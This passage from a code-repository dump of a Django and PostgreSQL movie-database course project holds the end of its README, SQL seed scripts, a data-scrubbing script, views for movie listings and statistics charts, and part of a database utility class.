`data/movies.csv` and `data/movies_with_omdb.csv`\n 5. Further tests were written to verify the consistency of the data.\n 6. Finally fixed values like `country`, `language`, and `genre` was extracted and SQL insert scripts were created for these.\n 7. For remaining tables, another script `data/jumbo_load.py` was written to run over the CSVs and insert everything into the database directly.\n\n## What technologies does it use?\n 1. PostgreSQL\n 2. Django\n 3. psycopg2\n 4. HTML\n 5. JavaScript\n 6. charts.js\n 7. d3.js\n 8. venn.js\n 9. Bootflat\n 10. CSS\n\n## How to set it up?\n1. `git clone https://github.tamu.edu/sswt/justmovies.git`\n2. `cd path/to/project`\n3. create `virtualenv` if you want. Recommended!!\n4. Install requirements with `pip install -r requirements.txt`\n5. Now create a fresh database in postgres.\n6. Add its credentials to `utils/credentials.py`\n7. Run `data/data_load.py`. This will take around 2 minutes to complete. If everything goes well, you will have the complete database after it ends.\n8. Alternatively, you can load data into postgres directly using the `data/dump.sql` pg_dump.\n9. Migrate `python manage.py migrate`. Although the application logic uses postgres, Django uses sqlite here. I did not change this because in a course project, I want to keep these separate.\n10. Start up the server `python manage.py runserver`\n\n## Screenshots\n![Movies Listing](https://i.imgur.com/oH94zgo.png)\n![Individual Celebrity Page](https://i.imgur.com/y0Tq5Yq.png)\n![Data Page](https://i.imgur.com/xTF76jy.png)\n![Edit Movie Page](https://i.imgur.com/jpQjzjI.png)\n\n## How to reach me if there's some issue?\nIf you have access, create an issue in this repo.\nOtherwise send me an email at sswt at tamu dot edu." 
}, { "alpha_fraction": 0.6394315958023071, "alphanum_fraction": 0.6536412239074707, "avg_line_length": 42.30769348144531, "blob_id": "59b997aaed755cf803c646da809e0edf53c0737a", "content_id": "1b1af3a4c1f143fe04c85a7478b88cfae6bef082", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 563, "license_type": "no_license", "max_line_length": 70, "num_lines": 13, "path": "/data/ratings.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO rating (\"name\") VALUES ('B');\nINSERT INTO rating (\"name\") VALUES ('B15');\nINSERT INTO rating (\"name\") VALUES ('G');\nINSERT INTO rating (\"name\") VALUES ('NC-17');\nINSERT INTO rating (\"name\") VALUES ('PG');\nINSERT INTO rating (\"name\") VALUES ('PG-13');\nINSERT INTO rating (\"name\") VALUES ('R');\nINSERT INTO rating (\"name\") VALUES ('TV-14');\nINSERT INTO rating (\"name\") VALUES ('TV-MA');\nINSERT INTO rating (\"name\") VALUES ('TV-PG');\nINSERT INTO rating (\"name\") VALUES ('UNRATED');\n\n-- ['N/A', 'NOT RATED', 'Not specified'] are all replaced with UNRATED\n" }, { "alpha_fraction": 0.5137839317321777, "alphanum_fraction": 0.5277901291847229, "avg_line_length": 35.87704849243164, "blob_id": "1af6d8c999ef65195ad20637f33594612dca0d77", "content_id": "8a15947549794a731e2cd5ff5bb0856ab105b398", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4498, "license_type": "no_license", "max_line_length": 97, "num_lines": 122, "path": "/data/data_scrub.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport ast\n\ndef test_omdb_data_integrity():\n count_rows = 0\n count_movie_okay = 0\n count_movie_not_found = 0\n with open(\"movies_with_omdb.csv\") as f:\n reader = csv.reader(f)\n headers = next(reader)\n for row in reader:\n assert(len(row) == 3)\n omdb_data = ast.literal_eval(row[2])\n count_rows += 1\n if omdb_data[\"Response\"] == \"True\":\n assert(len(omdb_data.keys()) == 25)\n count_movie_okay += 1\n else:\n assert(omdb_data[\"Error\"] == \"Movie not found!\")\n count_movie_not_found += 1\n print(\"Verified {} entries. OMDB matched {} movies. 
{} movies not found in their db.\".format(\n count_rows, count_movie_okay, count_movie_not_found\n ))\n\ndef test_movie_order_in_two_files():\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n assert(row1[6] == row2[0])\n assert(row1[14] == row2[1])\n\ndef get_countries():\n countries = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n countries.add(row1[2].strip())\n for c in omdb_data[\"Country\"].split(','):\n countries.add(c.strip())\n countries = sorted(countries)\n\n with open(\"countries.sql\", \"w\") as file:\n for country in countries:\n file.write(\"\"\"INSERT INTO country (\"name\") VALUES ('{}');\\n\"\"\".format(country))\n\ndef get_mpaa_ratings():\n mpaa_ratings = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n mpaa_ratings.add(row1[7].strip())\n for c in omdb_data[\"Rated\"].split(','):\n mpaa_ratings.add(c.strip())\n mpaa_ratings = sorted(mpaa_ratings)\n\n unrated_equivalents = [\"N/A\", \"NOT RATED\", \"Not specified\"]\n for x in unrated_equivalents:\n if x in mpaa_ratings:\n mpaa_ratings.remove(x)\n\n with open(\"ratings.sql\", \"w\") as file:\n for mpaa_rating in mpaa_ratings:\n file.write(\"\"\"INSERT INTO rating (\"name\") VALUES ('{}');\\n\"\"\".format(mpaa_rating))\n file.write(\"\\n-- {} are all replaced with UNRATED\\n\".format(unrated_equivalents))\n\ndef get_languages():\n languages = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n for c in omdb_data[\"Language\"].split(','):\n languages.add(c.strip())\n languages = sorted(languages)\n\n with open(\"languages.sql\", \"w\") as file:\n for language in languages:\n file.write(\"\"\"INSERT INTO language (\"name\") VALUES ('{}');\\n\"\"\".format(language))\n\ndef get_genres():\n genres = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n genres.add(row1[4].strip())\n for c in omdb_data[\"Genre\"].split(','):\n genres.add(c.strip())\n genres = sorted(genres)\n\n with open(\"genres.sql\", \"w\") as file:\n for genre in genres:\n file.write(\"\"\"INSERT INTO genre (\"name\") VALUES ('{}');\\n\"\"\".format(genre))\n\nif __name__=='__main__':\n test_omdb_data_integrity()\n test_movie_order_in_two_files()\n get_countries()\n get_mpaa_ratings()\n get_languages()\n get_genres()" }, { "alpha_fraction": 0.688524603843689, "alphanum_fraction": 0.688524603843689, "avg_line_length": 23.600000381469727, "blob_id": "0822dd384d9f07e3d79e623342541e345eb03857", "content_id": "593d8c0ec64d73050dd54235ec472fd9e4338916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
122, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/data/credentials.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "class DatabaseCredentials:\n\tdbname = 'your db name'\n\tuser = 'your db user'\n\thost = 'your db host'\n\tpassword = 'your password'" }, { "alpha_fraction": 0.39534884691238403, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 13.333333015441895, "blob_id": "e2481fa3687a6565b9d5c19fcd933689c67b2b87", "content_id": "26c156e464a94adcaeae5260dbd024532834446d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 43, "license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/requirements.txt", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "Django==2.1.2\npsycopg2==2.7.5\npytz==2018.5\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5306756496429443, "avg_line_length": 40.41469955444336, "blob_id": "952fbb0b28da4aeb6c70fc17f751528edd4ee194", "content_id": "cb5fe9217742027980d7653779d2b51fa7fa6dbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15778, "license_type": "no_license", "max_line_length": 151, "num_lines": 381, "path": "/justmovies/views.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseRedirect\nfrom django.views import View\nfrom django.shortcuts import render\n\nfrom utils.db_utils import DatabaseUtils\nfrom utils.enums import Enums\n\n\nclass MoviesView(View):\n def get(self, request):\n db = DatabaseUtils()\n\n filters = {\n \"title\": request.GET.get('title', ''),\n \"company\": request.GET.get('company', ''),\n \"year_gte\": request.GET.get('year_gte', ''),\n \"year_lte\": request.GET.get('year_lte', ''),\n \"imdb_rating\": request.GET.get('imdb_rating', '')\n }\n\n movies = db.get_movies(filters, page_number=int(request.GET.get('page', '1')))\n\n pagination = {\n \"page_number\": movies[\"pagination\"][\"page_number\"],\n \"page_size\": movies[\"pagination\"][\"page_size\"],\n \"total_hits\": movies[\"pagination\"][\"total_hits\"],\n \"total_pages\": movies[\"pagination\"][\"total_pages\"],\n \"pages\": None\n }\n\n pages = [\n i for i in range(1, movies[\"pagination\"][\"total_pages\"] + 1)\n if abs(movies[\"pagination\"][\"page_number\"] - i) <= 4\n ]\n\n if len(pages):\n if pages[0] != 1:\n pages = ['...'] + pages\n\n if pages[-1] != movies[\"pagination\"][\"total_pages\"]:\n pages = pages + ['...']\n\n pagination[\"pages\"] = pages\n\n context = {\n \"filters\": filters,\n \"movies\": [{\n \"pk\": m[0],\n \"title\": m[1],\n \"year\": m[2],\n \"company\": m[3],\n \"budget\": m[4],\n \"gross\": m[5],\n \"released\": m[6],\n \"runtime\": m[7],\n \"plot\": m[8],\n \"awards\": m[9],\n \"poster\": m[10],\n \"website\": m[11],\n \"imdb_rating\": m[12],\n \"imdb_id\": m[13],\n \"country\": m[14],\n \"rating\": m[15],\n \"genre\": m[16],\n \"language\": m[17]\n } for m in movies[\"values\"]],\n \"pagination\": pagination,\n \"ratings\": Enums.imdb_ratings\n }\n return render(request, 'justmovies/index.html', context)\n\n\nclass MovieEditView(View):\n def get_context_data(self, movie_pk):\n db = DatabaseUtils()\n movie = db.get_movie_from_pk(movie_pk)\n context = {\n \"movie\": {\n \"pk\": movie[0],\n \"title\": movie[1],\n \"year\": movie[2],\n \"company\": movie[3],\n \"budget\": movie[4],\n \"gross\": movie[5],\n \"released\": movie[6],\n \"runtime\": 
movie[7],\n \"plot\": movie[8],\n \"awards\": movie[9],\n \"poster\": movie[10],\n \"website\": movie[11],\n \"imdb_rating\": movie[12],\n \"imdb_id\": movie[13],\n \"country\": movie[14],\n \"rating\": movie[15],\n \"genre\": movie[16],\n \"language\": movie[17]\n },\n \"countries\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.countries],\n \"ratings\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.mpaa_ratings],\n \"genres\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.genres],\n \"languages\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.languages]\n }\n return context\n\n def get(self, request, movie_pk):\n return render(request, 'justmovies/movie_edit.html', self.get_context_data(movie_pk))\n\n def post(self, request, movie_pk):\n db = DatabaseUtils()\n if request.POST.get(\"action\", \"update\") == \"delete\":\n db.delete_movie(movie_pk)\n return HttpResponseRedirect('/')\n\n db.update_movie(movie_pk, {\n \"title\": request.POST.get(\"title\", \"\"),\n \"year\": request.POST.get(\"year\", \"\"),\n \"company\": request.POST.get(\"company\", \"\"),\n \"budget\": request.POST.get(\"budget\", \"\"),\n \"gross\": request.POST.get(\"gross\", \"\"),\n \"released\": request.POST.get(\"released\", \"\"),\n \"runtime\": request.POST.get(\"runtime\", \"\"),\n \"plot\": request.POST.get(\"plot\", \"\"),\n \"awards\": request.POST.get(\"awards\", \"\"),\n \"poster\": request.POST.get(\"poster\", \"\"),\n \"website\": request.POST.get(\"website\", \"\"),\n \"imdb_rating\": request.POST.get(\"imdb_rating\", \"\"),\n \"imdb_id\": request.POST.get(\"imdb_id\", \"\"),\n \"country\": request.POST.get(\"country\", \"\"),\n \"rating\": request.POST.get(\"rating\", \"\"),\n \"genre\": request.POST.get(\"genre\", \"\"),\n \"language\": request.POST.get(\"language\", \"\")\n })\n return render(request, 'justmovies/movie_edit.html', self.get_context_data(movie_pk))\n\n\nclass PeopleView(View):\n def get(self, request):\n db = DatabaseUtils()\n name = request.GET.get('name', 'Stephen King')\n\n if not name:\n return render(request, 'justmovies/people.html', {\"success\": False})\n\n person = db.get_people(name)\n\n if not person:\n return render(request, 'justmovies/people.html', {\"success\": False, \"name\": name})\n\n person = person[0]\n\n roles = db.get_personal_roles(person)\n roles = ', '.join([r[1] for r in roles])\n\n involvements = db.get_involvements(person)\n involvements = [{\n \"movie_pk\": i[0],\n \"title\": i[1],\n \"year\": i[2],\n \"awards\": i[9],\n \"poster\": i[10],\n \"role\": i[18]\n } for i in involvements]\n\n context = {\n \"success\": True,\n \"name\": person[1],\n \"dob\": person[2],\n \"image\": person[3],\n \"intro\": person[4],\n \"roles\": roles,\n \"involvements\": involvements,\n }\n return render(request, 'justmovies/people.html', context)\n\n\nclass DataView(View):\n def get(self, request):\n db = DatabaseUtils()\n cursor = db.get_cursor()\n\n cursor.execute(\"SELECT COUNT(*), MIN(year), MAX(year), SUM(budget) FROM movie;\")\n moviesGeneral = cursor.fetchone()\n\n cursor.execute(\"SELECT COUNT(*) FROM person;\")\n peopleGeneral = cursor.fetchone()\n\n general = {\n \"moviesCount\": moviesGeneral[0],\n \"moviesMinYear\": moviesGeneral[1],\n \"moviesMaxYear\": moviesGeneral[2],\n \"moviesBudget\": moviesGeneral[3] // 1000000,\n \"totalPeople\": peopleGeneral[0],\n \"totalReviews\": 0,\n }\n\n # DISTRIBUTION BY GENRE\n cursor.execute(\"select g.name, count(*) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) limit 
8;\")\n countDistByGenre = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) offset 8;\")\n remainingGenres = cursor.fetchall()\n remainingGenres = sum([r[0] for r in remainingGenres])\n countDistByGenre = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByGenre] + [remainingGenres],\n \"backgroundColor\": Enums.colors[:len(countDistByGenre)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByGenre] + [\"Others\"]\n }\n\n # DISTRIBUTION BY COUNTRY\n cursor.execute(\"select c.name, count(*) from movie m join country c on m.country = c.pk group by c.name order by -count(*) limit 5;\")\n countDistByCountry = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join country c on m.country = c.pk group by c.name order by -count(*) offset 5;\")\n remainingCountries = cursor.fetchall()\n remainingCountries = sum([r[0] for r in remainingCountries])\n countDistByCountry = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByCountry] + [remainingCountries],\n \"backgroundColor\": Enums.colors[:len(countDistByCountry)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByCountry] + [\"Others\"]\n }\n\n # DISTRIBUTION BY LANGUAGE\n cursor.execute(\"select c.name, count(*) from movie m join language c on m.language = c.pk group by c.name order by -count(*) limit 5;\")\n countDistByLanguage = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join language c on m.language = c.pk group by c.name order by -count(*) offset 5;\")\n remainingLanguages = cursor.fetchall()\n remainingLanguages = sum([r[0] for r in remainingLanguages])\n countDistByLanguage = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByLanguage] + [remainingLanguages],\n \"backgroundColor\": Enums.colors[:len(countDistByLanguage)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByLanguage] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY GENRE\n cursor.execute(\"select g.name, sum(budget) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) limit 8;\")\n budgetDistByGenre = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) offset 8;\")\n remainingGenres = cursor.fetchall()\n remainingGenres = sum([r[0] for r in remainingGenres])\n budgetDistByGenre = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByGenre] + [remainingGenres],\n \"backgroundColor\": Enums.colors[:len(budgetDistByGenre)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByGenre] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY COUNTRY\n cursor.execute(\"select c.name, sum(budget) from movie m join country c on m.country = c.pk group by c.name order by -count(*) limit 5;\")\n budgetDistByCountry = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join country c on m.country = c.pk group by c.name order by -count(*) offset 5;\")\n remainingCountries = cursor.fetchall()\n remainingCountries = sum([r[0] for r in remainingCountries])\n budgetDistByCountry = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByCountry] + [remainingCountries],\n \"backgroundColor\": Enums.colors[:len(budgetDistByCountry)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByCountry] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY LANGUAGE\n cursor.execute(\"select c.name, sum(budget) from movie m join language c on m.language = c.pk 
group by c.name order by -count(*) limit 5;\")\n budgetDistByLanguage = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join language c on m.language = c.pk group by c.name order by -count(*) offset 5;\")\n remainingLanguages = cursor.fetchall()\n remainingLanguages = sum([r[0] for r in remainingLanguages])\n budgetDistByLanguage = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByLanguage] + [remainingLanguages],\n \"backgroundColor\": Enums.colors[:len(budgetDistByLanguage)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByLanguage] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY YEAR\n cursor.execute(\"select year, avg(budget)::numeric::integer from movie group by year order by year;\")\n budgetDistByYear = cursor.fetchall()\n budgetDistByYear = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByYear],\n \"backgroundColor\": Enums.colors[:len(budgetDistByYear)]\n }],\n \"labels\": [g[0] for g in budgetDistByYear]\n }\n print(budgetDistByYear)\n\n # ROLES DISTRIBUTION\n cursor.execute(\"SELECT count(person.pk), role FROM person JOIN personal_role ON person.pk = personal_role.person group by personal_role.role;\")\n celebrityRoleDistribution = cursor.fetchall()\n celebrityRoleDistribution = [{\n \"sets\": [c[1]],\n \"size\": c[0]\n } for c in celebrityRoleDistribution]\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Actor\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Director') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Director\", \"Actor\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Director');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Director\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Director') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Actor\", \"Director\"],\n \"size\": result[0]\n })\n\n # TOP RATED CELEBRITIES\n cursor.execute(\"\"\"\n select\n ip.name,\n avg(NULLIF(imdb_rating, 'N/A') :: float) as avg_rating,\n count(*) as movie_count\n from movie m\n join (select\n p.name,\n i.movie\n from person p\n join involvement i on p.pk = i.person) ip on ip.movie = m.pk\n group by ip.name\n having count(*) >= 10\n order by -avg(NULLIF(imdb_rating, 'N/A') :: float)\n limit 10;\n \"\"\")\n topRatedCelebrities = cursor.fetchall()\n topRatedCelebrities = [{\n \"name\": t[0],\n \"avg_rating\": '{0:.2f}'.format(t[1]),\n \"movie_count\": t[2]\n } for t in topRatedCelebrities]\n\n context = {\n \"general\": general,\n \"countDistByGenre\": countDistByGenre,\n \"countDistByCountry\": countDistByCountry,\n \"countDistByLanguage\": 
countDistByLanguage,\n \"budgetDistByGenre\": budgetDistByGenre,\n \"budgetDistByCountry\": budgetDistByCountry,\n \"budgetDistByLanguage\": budgetDistByLanguage,\n \"budgetDistByYear\": budgetDistByYear,\n \"celebrityRoleDistribution\": celebrityRoleDistribution,\n \"topRatedCelebrities\": topRatedCelebrities\n }\n return render(request, 'justmovies/data.html', context)" }, { "alpha_fraction": 0.6962617039680481, "alphanum_fraction": 0.6962617039680481, "avg_line_length": 49.085105895996094, "blob_id": "6ff248f8ef9f1907f41843bed3ba65f91ab5e536", "content_id": "c115852b1441bf9d42b05625d19cf9bf5aba72de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 4708, "license_type": "no_license", "max_line_length": 71, "num_lines": 94, "path": "/data/countries.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO country (\"name\") VALUES ('Albania');\nINSERT INTO country (\"name\") VALUES ('Angola');\nINSERT INTO country (\"name\") VALUES ('Argentina');\nINSERT INTO country (\"name\") VALUES ('Aruba');\nINSERT INTO country (\"name\") VALUES ('Australia');\nINSERT INTO country (\"name\") VALUES ('Austria');\nINSERT INTO country (\"name\") VALUES ('Bahamas');\nINSERT INTO country (\"name\") VALUES ('Belgium');\nINSERT INTO country (\"name\") VALUES ('Bosnia and Herzegovina');\nINSERT INTO country (\"name\") VALUES ('Botswana');\nINSERT INTO country (\"name\") VALUES ('Brazil');\nINSERT INTO country (\"name\") VALUES ('Bulgaria');\nINSERT INTO country (\"name\") VALUES ('Burkina Faso');\nINSERT INTO country (\"name\") VALUES ('Cambodia');\nINSERT INTO country (\"name\") VALUES ('Cameroon');\nINSERT INTO country (\"name\") VALUES ('Canada');\nINSERT INTO country (\"name\") VALUES ('Chile');\nINSERT INTO country (\"name\") VALUES ('China');\nINSERT INTO country (\"name\") VALUES ('Colombia');\nINSERT INTO country (\"name\") VALUES ('Croatia');\nINSERT INTO country (\"name\") VALUES ('Cuba');\nINSERT INTO country (\"name\") VALUES ('Czech Republic');\nINSERT INTO country (\"name\") VALUES ('Denmark');\nINSERT INTO country (\"name\") VALUES ('Ecuador');\nINSERT INTO country (\"name\") VALUES ('Federal Republic of Yugoslavia');\nINSERT INTO country (\"name\") VALUES ('Finland');\nINSERT INTO country (\"name\") VALUES ('France');\nINSERT INTO country (\"name\") VALUES ('Germany');\nINSERT INTO country (\"name\") VALUES ('Ghana');\nINSERT INTO country (\"name\") VALUES ('Greece');\nINSERT INTO country (\"name\") VALUES ('Hong Kong');\nINSERT INTO country (\"name\") VALUES ('Hungary');\nINSERT INTO country (\"name\") VALUES ('Iceland');\nINSERT INTO country (\"name\") VALUES ('India');\nINSERT INTO country (\"name\") VALUES ('Indonesia');\nINSERT INTO country (\"name\") VALUES ('Iran');\nINSERT INTO country (\"name\") VALUES ('Iraq');\nINSERT INTO country (\"name\") VALUES ('Ireland');\nINSERT INTO country (\"name\") VALUES ('Isle Of Man');\nINSERT INTO country (\"name\") VALUES ('Israel');\nINSERT INTO country (\"name\") VALUES ('Italy');\nINSERT INTO country (\"name\") VALUES ('Jamaica');\nINSERT INTO country (\"name\") VALUES ('Japan');\nINSERT INTO country (\"name\") VALUES ('Jordan');\nINSERT INTO country (\"name\") VALUES ('Kazakhstan');\nINSERT INTO country (\"name\") VALUES ('Kenya');\nINSERT INTO country (\"name\") VALUES ('Latvia');\nINSERT INTO country (\"name\") VALUES ('Lebanon');\nINSERT INTO country (\"name\") VALUES ('Liechtenstein');\nINSERT INTO country (\"name\") VALUES ('Lithuania');\nINSERT INTO 
country (\"name\") VALUES ('Luxembourg');\nINSERT INTO country (\"name\") VALUES ('Malta');\nINSERT INTO country (\"name\") VALUES ('Mexico');\nINSERT INTO country (\"name\") VALUES ('Monaco');\nINSERT INTO country (\"name\") VALUES ('Morocco');\nINSERT INTO country (\"name\") VALUES ('Netherlands');\nINSERT INTO country (\"name\") VALUES ('New Zealand');\nINSERT INTO country (\"name\") VALUES ('Norway');\nINSERT INTO country (\"name\") VALUES ('Palestine');\nINSERT INTO country (\"name\") VALUES ('Panama');\nINSERT INTO country (\"name\") VALUES ('Paraguay');\nINSERT INTO country (\"name\") VALUES ('Peru');\nINSERT INTO country (\"name\") VALUES ('Philippines');\nINSERT INTO country (\"name\") VALUES ('Poland');\nINSERT INTO country (\"name\") VALUES ('Portugal');\nINSERT INTO country (\"name\") VALUES ('Qatar');\nINSERT INTO country (\"name\") VALUES ('Republic of Macedonia');\nINSERT INTO country (\"name\") VALUES ('Romania');\nINSERT INTO country (\"name\") VALUES ('Russia');\nINSERT INTO country (\"name\") VALUES ('Saudi Arabia');\nINSERT INTO country (\"name\") VALUES ('Serbia');\nINSERT INTO country (\"name\") VALUES ('Singapore');\nINSERT INTO country (\"name\") VALUES ('Slovakia');\nINSERT INTO country (\"name\") VALUES ('Slovenia');\nINSERT INTO country (\"name\") VALUES ('South Africa');\nINSERT INTO country (\"name\") VALUES ('South Korea');\nINSERT INTO country (\"name\") VALUES ('Soviet Union');\nINSERT INTO country (\"name\") VALUES ('Spain');\nINSERT INTO country (\"name\") VALUES ('Sweden');\nINSERT INTO country (\"name\") VALUES ('Switzerland');\nINSERT INTO country (\"name\") VALUES ('Taiwan');\nINSERT INTO country (\"name\") VALUES ('Thailand');\nINSERT INTO country (\"name\") VALUES ('Tunisia');\nINSERT INTO country (\"name\") VALUES ('Turkey');\nINSERT INTO country (\"name\") VALUES ('UK');\nINSERT INTO country (\"name\") VALUES ('USA');\nINSERT INTO country (\"name\") VALUES ('Ukraine');\nINSERT INTO country (\"name\") VALUES ('United Arab Emirates');\nINSERT INTO country (\"name\") VALUES ('Uruguay');\nINSERT INTO country (\"name\") VALUES ('Venezuela');\nINSERT INTO country (\"name\") VALUES ('Vietnam');\nINSERT INTO country (\"name\") VALUES ('West Germany');\nINSERT INTO country (\"name\") VALUES ('Yugoslavia');\nINSERT INTO country (\"name\") VALUES ('Zimbabwe');\n" }, { "alpha_fraction": 0.5694145560264587, "alphanum_fraction": 0.5738269686698914, "avg_line_length": 34.87644958496094, "blob_id": "e1300a00a6c4fc0359d77944e8c835317582caf7", "content_id": "4381270f02c718de37503aaf4e35bd4fcb13df11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9292, "license_type": "no_license", "max_line_length": 148, "num_lines": 259, "path": "/utils/db_utils.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import psycopg2\nfrom psycopg2 import sql\nimport sys\nimport os.path\nfrom utils.credentials import DatabaseCredentials as dbc\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\n\nclass DatabaseUtils():\n cursor = None\n connection = None\n genres = []\n mpaa_ratings = []\n countries = []\n languages = []\n\n # CONSTRUCTOR\n def __init__(self):\n self.connection = psycopg2.connect(\"dbname='{0}' user='{1}' host='{2}' password='{3}'\".format(dbc.dbname, dbc.user, dbc.host, dbc.password))\n self.connection.set_client_encoding('UNICODE')\n\n # cursor to perform database operations\n self.cursor = self.connection.cursor()\n\n self.fetch_enums()\n\n 
# DESTRUCTOR\n def __del__(self):\n # close communication with the database\n self.cursor.close()\n self.connection.close()\n\n # MISC\n def commit(self):\n # make the changes to the database persistent\n self.connection.commit()\n\n def get_cursor(self):\n return self.cursor\n\n def get_connection(self):\n return self.connection\n\n def print_query(self, query):\n # just for debugging\n print(\"----------------------------------------------\")\n print(self.cursor.mogrify(query))\n print(\"----------------------------------------------\")\n\n def fetch_enums(self):\n # genres\n self.cursor.execute(\"SELECT * FROM genre;\")\n self.genres = self.cursor.fetchall()\n\n # mpaa_ratings\n self.cursor.execute(\"SELECT * FROM rating;\")\n self.mpaa_ratings = self.cursor.fetchall()\n\n # countries\n self.cursor.execute(\"SELECT * FROM country;\")\n self.countries = self.cursor.fetchall()\n\n # languages\n self.cursor.execute(\"SELECT * FROM language;\")\n self.languages = self.cursor.fetchall()\n\n # PEOPLE\n def get_person(self, name):\n query = sql.SQL(\"SELECT * FROM person WHERE name={0};\").format(\n sql.Literal(name)\n )\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n def get_people(self, name):\n query = sql.SQL(\"SELECT * FROM person WHERE name ilike {0};\").format(\n sql.Literal(\"%\" + name + \"%\")\n )\n self.cursor.execute(query)\n return self.cursor.fetchall()\n\n def insert_person(self, name, dob=None):\n if dob:\n query = sql.SQL(\"\"\"INSERT INTO person (\"name\", \"dob\") VALUES ({}, {});\"\"\").format(\n sql.Literal(name), sql.Literal(dob)\n )\n else:\n query = sql.SQL(\"\"\"INSERT INTO person (\"name\") VALUES ({});\"\"\").format(\n sql.Literal(name)\n )\n self.cursor.execute(query)\n\n def insert_then_get_person(self, name, dob=None):\n self.insert_person(name, dob)\n return self.get_person(name)\n\n # PERSONAL ROLES\n def get_personal_role(self, person_pk, 